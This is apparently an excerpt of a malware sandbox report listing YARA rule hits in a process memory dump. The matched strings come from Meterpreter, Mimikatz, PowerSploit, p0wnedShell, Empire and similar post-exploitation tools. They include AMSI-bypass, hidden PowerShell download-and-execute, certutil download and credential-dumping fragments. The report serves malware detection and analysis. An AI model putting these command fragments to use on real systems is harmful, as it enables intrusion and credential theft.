- 0xe2b6:$s2: .concat(".exe");
- 0xe2cb:$s3: [0] = "chmod";
- 0xe2de:$s4: = Runtime.getRuntime().exec(
- 0x2008a:$s4: = Runtime.getRuntime().exec(
- 0x241e6:$s4: = Runtime.getRuntime().exec(
- 0x38a01:$s4: = Runtime.getRuntime().exec(
- 0x5353f:$s4: = Runtime.getRuntime().exec(
- 0xe2ff:$s5: , 16) & 0xff;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0xe687:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0xdbd1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xe6d3:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xe704:$s3: = CreateObject("Wscript.Shell")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0xe82f:$s1: kernel32.dll WaitForSingleObject),
- 0xe856:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0xe8cd:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0xe933:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0xd505:$s5: = [System.Convert]::FromBase64String(
- 0xe976:$s5: = [System.Convert]::FromBase64String(
- 0xe9a0:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0xe9da:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0xecce:$xx1: 6D 65 74 73 72 76 2E 64 6C 6C 00 00 52 65 66 6C 65 63 74 69 76 65 4C 6F 61 64 65 72
- 0xecf0:$xx2: metsrv.x64.dll
- 0xed03:$xs1: WS2_32.dll
- 0x40a:$xs2: ReflectiveLoader
- 0xaac5:$xs2: ReflectiveLoader
- 0xab88:$xs2: ReflectiveLoader
- 0xabb6:$xs2: ReflectiveLoader
- 0xabdc:$xs2: ReflectiveLoader
- 0xac06:$xs2: ReflectiveLoader
- 0xac32:$xs2: ReflectiveLoader
- 0xadab:$xs2: ReflectiveLoader
- 0xae14:$xs2: ReflectiveLoader
- 0xb1fd:$xs2: ReflectiveLoader
- 0xb279:$xs2: ReflectiveLoader
- 0xecda:$xs2: ReflectiveLoader
- 0xed12:$xs2: ReflectiveLoader
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Base64_PS1_Shellcode | Detects Base64 encoded PS1 Shellcode | Nick Carr, David Ledbetter | - 0x175f6:$substring: AAAAYInlM
- 0x1760e:$substring: AAAAYInlM
- 0x17626:$substring: AAAAYInlM
- 0x1760a:$pattern1: /OiCAAAAYInlM
- 0x17622:$pattern2: /OiJAAAAYInlM
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x12a61:$x1: /\/===\__
- 0x12a6f:$x2: ${__/\/==
- 0x12a7d:$x3: Catch { }
- 0x12a8b:$x4: \_/=} ${_
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_OBFUSC_PowerShell_True_Jun20_1 | Detects indicators often found in obfuscated PowerShell scripts | Florian Roth | - 0x12cf5:$: ${t`rue}
- 0x12d00:$: ${tr`ue}
- 0x12d0b:$: ${tru`e}
- 0x12d16:$: ${t`ru`e}
- 0x12d22:$: ${tr`u`e}
- 0x12d2e:$: ${t`r`ue}
- 0x12d3a:$: ${t`r`u`e}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Recon_Commands_Windows_Gen1 | Detects a set of reconnaissance commands on Windows systems | Florian Roth | - 0x4483b:$s1: netstat -an
- 0x4680c:$s1: netstat -an
- 0x25120:$s3: net user
- 0x30ecd:$s4: whoami
- 0x30ed5:$s4: whoami
- 0x30ee2:$s4: whoami
- 0x30ef2:$s4: whoami
- 0x30efd:$s4: whoami
- 0x3f1c2:$s4: whoami
- 0x3f1ca:$s4: whoami
- 0x3f1d7:$s4: whoami
- 0x5a495:$s4: whoami
- 0x5a524:$s4: whoami
- 0x5a63d:$s4: whoami
- 0x5a6d1:$s4: whoami
- 0x5a7ee:$s4: whoami
- 0x5a87f:$s4: whoami
- 0xc41b:$s11: regsvr32 /s /u
- 0x177ce:$s15: schtasks.exe /Create
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Payload_Exe2Hex | Detects payload generated by exe2hex | Florian Roth | - 0x1aebd:$a1: set /p "=4d5a
- 0x1aecf:$a2: powershell -Command "$hex=
- 0x1aeee:$b1: set+%2Fp+%22%3D4d5
- 0x1af05:$b2: powershell+-Command+%22%24hex
- 0x1af27:$c1: echo 4d 5a
- 0x1af37:$c2: echo r cx >>
- 0x1af48:$d1: echo+4d+5a+
- 0x1af58:$d2: echo+r+cx+%3E%3E
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0xad5d:$x1: \Release\reflective_dll.pdb
- 0xad7d:$x2: reflective_dll.x64.dll
- 0xad98:$s3: DLL Injection
- 0xadaa:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0xae13:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0xb1af:$x1: \ReflectiveDLLInjection-master\
- 0xb1d3:$s2: reflective_dll.dll
- 0xb3ef:$s2: reflective_dll.dll
- 0xb430:$s2: reflective_dll.dll
- 0x5709:$s3: DLL injection
- 0xb1ea:$s3: DLL injection
- 0x52716:$s3: DLL injection
- 0xac05:$s4: _ReflectiveLoader@4
- 0xb1fc:$s4: _ReflectiveLoader@4
- 0xb278:$s4: _ReflectiveLoader@4
- 0xb214:$s5: Reflective Dll Injection
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0xb39c:$s1: \Release\inject.pdb
- 0xb3b4:$s2: !!! Failed to gather information on system processes!
- 0xb1d3:$s3: reflective_dll.dll
- 0xb3ef:$s3: reflective_dll.dll
- 0xb430:$s3: reflective_dll.dll
- 0xb406:$s4: [-] %s. Error=%d
- 0xb41b:$s5: \Start Menu\Programs\reflective_dll.dll
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | GetUserSPNs_VBS | Auto-generated rule - file GetUserSPNs.vbs | Florian Roth | - 0xa559:$s1: Wscript.Echo "User Logon: " & oRecordset.Fields("samAccountName")
- 0xa59f:$s2: Wscript.Echo " USAGE: " & WScript.ScriptName & " SpnToFind [GC Servername or Forestname]"
- 0xa604:$s3: strADOQuery = "<" + strGCPath + ">;(&(!objectClass=computer)(servicePrincipalName=*));" & _
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | GetUserSPNs_PS1 | Auto-generated rule - file GetUserSPNs.ps1 | Florian Roth | - 0xa780:$s1: $ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
- 0xa7d8:$s2: @{Name="PasswordLastSet"; Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} } #, `
- 0xa84d:$s3: Write-Host "No Global Catalogs Found!"
- 0xa878:$s4: $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | kerberoast_PY | Auto-generated rule - file kerberoast.py | Florian Roth | - 0xa9cc:$s1: newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
- 0xaa26:$s2: key = kerberos.ntlmhash(args.password)
- 0xaa51:$s3: help='the password used to decrypt/encrypt the ticket')
- 0xaa8d:$s4: newencserverticket = kerberos.encrypt(key, 2, e, nonce)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedPowerCat | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs | Florian Roth | - 0xf81e:$x1: Now if we point Firefox to http://127.0.0.1
- 0xf84e:$x2: powercat -l -v -p
- 0xf864:$x3: P0wnedListener
- 0xfc2d:$x3: P0wnedListener
- 0xf877:$x4: EncodedPayload.bat
- 0xf88e:$x5: powercat -c
- 0xf89f:$x6: Program.P0wnedPath()
- 0x10804:$x6: Program.P0wnedPath()
- 0xf8b8:$x7: Invoke-PowerShellTcpOneLine
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0xfa1a:$x1: Invoke-TokenManipulation
- 0xffe6:$x1: Invoke-TokenManipulation
- 0xfa37:$x2: windows/meterpreter
- 0x10092:$x2: windows/meterpreter
- 0x11a5c:$x2: windows/meterpreter
- 0xfa4f:$x3: lsadump::dcsync
- 0xfa63:$x4: p0wnedShellx86
- 0xfa76:$x5: p0wnedShellx64
- 0xfe25:$x5: p0wnedShellx64
- 0xfe76:$x5: p0wnedShellx64
- 0xfa89:$x6: Invoke_PsExec()
- 0x3278:$x7: Invoke-Mimikatz
- 0x61c9:$x7: Invoke-Mimikatz
- 0x9550:$x7: Invoke-Mimikatz
- 0x95ef:$x7: Invoke-Mimikatz
- 0xfa9d:$x7: Invoke-Mimikatz
- 0x11bef:$x7: Invoke-Mimikatz
- 0x12418:$x7: Invoke-Mimikatz
- 0x15600:$x7: Invoke-Mimikatz
- 0x157c2:$x7: Invoke-Mimikatz
- 0x15f15:$x7: Invoke-Mimikatz
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedPotato | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs | Florian Roth | - 0xfc1c:$x1: Invoke-Tater
- 0xfc2d:$x2: P0wnedListener.Execute(WPAD_Proxy);
- 0xfc55:$x3: -SpooferIP
- 0xfc66:$x4: TaterCommand()
- 0xfc79:$x5: FileName = "cmd.exe",
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedExploits | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs | Florian Roth | - 0xfdca:$x1: Pshell.RunPSCommand(Whoami);
- 0xfdeb:$x2: If succeeded this exploit should popup a System CMD Shell
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedBinaries | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs | Florian Roth | - 0xff61:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x10411:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x10483:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f
- 0x104f4:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98
- 0x10565:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+
- 0x105d3:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/
- 0x10641:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR
- 0x106af:$x7: namespace p0wnedShell
- 0x1081d:$x7: namespace p0wnedShell
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedAmsiBypass | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs | Florian Roth | - 0xf89f:$x1: Program.P0wnedPath()
- 0x10804:$x1: Program.P0wnedPath()
- 0x106af:$x2: namespace p0wnedShell
- 0x1081d:$x2: namespace p0wnedShell
- 0x10837:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | p0wnedShell_outputs | p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs | Florian Roth | - 0x10a03:$s1: [+] For this attack to succeed, you need to have Admin privileges.
- 0x10a4a:$s2: [+] This is not a valid hostname, please try again
- 0x10a81:$s3: [+] First return the name of our current domain.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_PowerUp | Auto-generated rule - file PowerUp.ps1 | Florian Roth | - 0x14f0b:$s1: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | % {
- 0x14f62:$s2: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | % {
- 0x14fb8:$s3: if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {
- 0x1503a:$s4: C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath |
- 0x15085:$s5: if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe"))
- 0x150c9:$s6: if (Test-Path ("$Env:SystemRoot\System32\InetSRV\appcmd.exe")) {
- 0x1510f:$s7: Write-Verbose "Executing command '$Cmd'"
- 0x1513c:$s8: Write-Warning "[!] Target service
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Inveigh_BruteForce | Auto-generated rule - file Inveigh-BruteForce.ps1 | Florian Roth | - 0x15297:$s1: Import-Module .\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11
- 0x152ee:$s2: $(Get-Date -format 's') - Attempting to stop HTTP listener")|Out-Null
- 0x15338:$s3: Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_Shellcode | Auto-generated rule - file Invoke-Shellcode.ps1 | Florian Roth | - 0x110d8:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x154b4:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x156f0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x154e8:$s2: Get-ProcAddress kernel32.dll OpenProcess
- 0x15515:$s3: msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
- 0x1558f:$s4: inject shellcode into
- 0x11aac:$s5: Injecting shellcode
- 0x155a9:$s5: Injecting shellcode
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_Mimikatz | Auto-generated rule - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x110d8:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x154b4:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x156f0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x15724:$s2: ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId
- 0x15771:$s3: privilege::debug exit
- 0x1578b:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x15b39:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x157c2:$s5: Invoke-Mimikatz -DumpCreds
- 0x157e1:$s6: | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_RelfectivePEInjection | Auto-generated rule - file Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x15984:$x1: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
- 0x159fa:$x2: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local
- 0x15a60:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken
- 0x15a95:$x4: Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local
- 0x15af3:$s5: $PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')
- 0x15b37:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Persistence | Auto-generated rule - file Persistence.ps1 | Florian Roth | - 0x15c97:$s1: "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```
- 0x15cf2:$s2: }=$PROFILE.AllUsersAllHosts;${
- 0x15d15:$s3: C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
- 0x15d66:$s4: = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture
- 0x15daf:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))
- 0x15e0b:$s6: }=$PROFILE.CurrentUserAllHosts;${
- 0x15e31:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x1692d:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x15e7e:$s8: [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection | Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x16079:$s1: [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
- 0x160eb:$s2: if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
- 0x16148:$s3: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
- 0x161b2:$s4: Function Import-DllInRemoteProcess
- 0x161d9:$s5: FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))
- 0x1620c:$s6: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
- 0x16264:$s7: [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
- 0x162b3:$s8: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
- 0x1631a:$s9: ::FromBase64String('RABvAG4AZQAhAA==')))
- 0x16348:$s10: Write-Verbose "PowerShell ProcessID: $PID"
- 0x16378:$s11: [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Inveigh_BruteForce_2 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x16528:$s1: }.NTLMv2_file_queue[0]|Out-File ${
- 0x1654f:$s2: }.NTLMv2_file_queue.RemoveRange(0,1)
- 0x16578:$s3: }.NTLMv2_file_queue.Count -gt 0)
- 0x1659d:$s4: }.relay_running = $false
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_PowerUp_2 | Auto-generated rule - from files PowerUp.ps1 | Florian Roth | - 0x166e1:$s1: if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::
- 0x1672c:$s2: FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {
- 0x16766:$s3: $Null = Invoke-ServiceStart
- 0x16786:$s4: Write-Warning "[!] Access to service $
- 0x167b1:$s5: } = $MyConString.Split("=")[1].Split(";")[0]
- 0x167e2:$s6: } += "net localgroup ${
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Persistence_2 | Auto-generated rule - from files Persistence.ps1 | Florian Roth | - 0x15e31:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x1692d:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x1697a:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')
- 0x169c3:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')
- 0x16a04:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- 0x16a54:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))
- 0x16aa7:$s6: [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
- 0x16af8:$s7: FromBase64String('TQBlAHQAaABvAGQA')
- 0x16b21:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=')
- 0x16b4e:$s9: [Runtime.InteropServices.CallingConvention]::Winapi,
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ps1_toolkit_Inveigh_BruteForce_3 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x16cc4:$s1: ::FromBase64String('TgBUAEwATQA=')
- 0x16ceb:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))
- 0x16d28:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))
- 0x16d69:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))
- 0x16dae:$s5: [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
- 0x16dfc:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA
- 0x16e3f:$s7: }.bruteforce_running)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Suspicious_PowerShell_Code_1 | Detects suspicious PowerShell code | Florian Roth | - 0x13ac2:$s4: powershell.exe -w hidden -ep bypass -Enc
- 0x13aef:$s5: -w hidden -noni -nop -c "iex(New-Object
- 0x13b1b:$s6: powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth | - 0x149aa:$: ::FromBase64String("H4s
- 0x14b43:$: ::FromBase64String("H4s
- 0x149c4:$: ::FromBase64String("TVq
- 0x149de:$: ::FromBase64String("UEs
- 0x149f8:$: ::FromBase64String("JAB
- 0x14a12:$: ::FromBase64String("SUVY
- 0x14a2d:$: ::FromBase64String("SQBFAF
- 0x14a4a:$: ::FromBase64String("SQBuAH
- 0x14a67:$: ::FromBase64String("PAA
- 0x14a81:$: ::FromBase64String("cwBhA
- 0x14a9d:$: ::FromBase64String("aWV4
- 0x14ab8:$: ::FromBase64String("aQBlA
- 0x14ad4:$: ::FromBase64String("R2V0
- 0x14aef:$: ::FromBase64String("dmFy
- 0x14b0a:$: ::FromBase64String("dgBhA
- 0x14b26:$: ::FromBase64String("dXNpbm
- 0x14b43:$: ::FromBase64String("H4sIA
- 0x14b5f:$: ::FromBase64String("Y21k
- 0x14b7a:$: ::FromBase64String("Qzpc
- 0x14b95:$: ::FromBase64String("Yzpc
- 0x14bb0:$: ::FromBase64String("IAB
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x6df6:$s1: <hta:application windowstate="minimize"/>
- 0x6f62:$s1: <hta:application windowstate="minimize"/>
- 0x6e24:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a supicious VBS script that drops an executable | Florian Roth | - 0x3369:$s5: TVqQAAMAAAAEAA
- 0x4a8a:$s5: TVqQAAMAAAAEAA
- 0x965a:$s5: TVqQAAMAAAAEAA
- 0x11cf2:$s5: TVqQAAMAAAAEAA
- 0x12208:$s5: TVqQAAMAAAAEAA
- 0xdbad:$a1: = CreateObject("Wscript.Shell")
- 0xe704:$a1: = CreateObject("Wscript.Shell")
- 0x14163:$a1: = CreateObject("Wscript.Shell")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0xbd36:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0xbe75:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0xbea0:$x2: script:https://www.dropbox.com
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0xbfa7:$s1: mshtml,RunHTMLApplication
- 0xbfc5:$s2: new ActiveXObject("WScript.Shell").Run(
- 0xbff1:$s3: /c start mshta j
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0xc0f8:$s1: w = new ActiveXObject(
- 0xc113:$s2: w.Run(r);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Certutil_Decode_OR_Download | Certutil Decode | Florian Roth | - 0xc1f4:$a1: certutil -decode
- 0xc20a:$a2: certutil -decode
- 0xc221:$a3: certutil.exe -decode
- 0xc23b:$a4: certutil.exe -decode
- 0xc256:$a5: certutil -urlcache -split -f http
- 0xc27c:$a6: certutil.exe -urlcache -split -f http
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | VBS_Obfuscated_Mal_Feb18_1 | Detects malicious obfuscated VBS observed in February 2018 | Florian Roth | - 0xc77c:$x1: A( Array( (1* 2^1 )+
- 0xc795:$x2: .addcode(A( Array(
- 0xc7ac:$x3: false:AA.send:Execute(AA.responsetext):end
- 0xc7db:$x4: & A( Array( (1* 2^1 )+
- 0xc7f7:$s1: .SYSTEMTYPE:NEXT:IF (UCASE(
- 0xc817:$s2: A = STR:next:end function
- 0xc835:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mimikatz_Memory_Rule_1 | Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures) | Florian Roth | - 0x1200d:$s11: sekurlsa::pth
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HKTL_PowerSploit | Detects default strings used by PowerSploit to establish persistence | Markus Neis | - 0x11f0:$ps: function
- 0x35b8:$ps: function
- 0x524b:$ps: Function
- 0xc828:$ps: function
- 0xdd92:$ps: Function
- 0xdf64:$ps: Function
- 0x116ae:$ps: FUNCTION
- 0x14595:$ps: Function
- 0x145db:$ps: Function
- 0x146e2:$ps: Function
- 0x161b2:$ps: Function
- 0x16fa9:$ps: function
- 0x17896:$ps: function
- 0x1f850:$ps: Function
- 0x23a2a:$ps: function
- 0x2507c:$ps: function
- 0x2b896:$ps: function
- 0x2b8c6:$ps: function
- 0x2e5c2:$ps: Function
- 0x2e5ef:$ps: Function
- 0x30953:$ps: Function
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_BypassUAC | Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1 | Florian Roth | - 0x110be:$s1: $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x1110c:$s2: $proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru
- 0x11150:$s3: $Payload = Invoke-PatchDll -DllBytes $Payload -FindString "ExitThread" -ReplaceString "ExitProcess"
- 0x111b8:$s4: $temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)
|
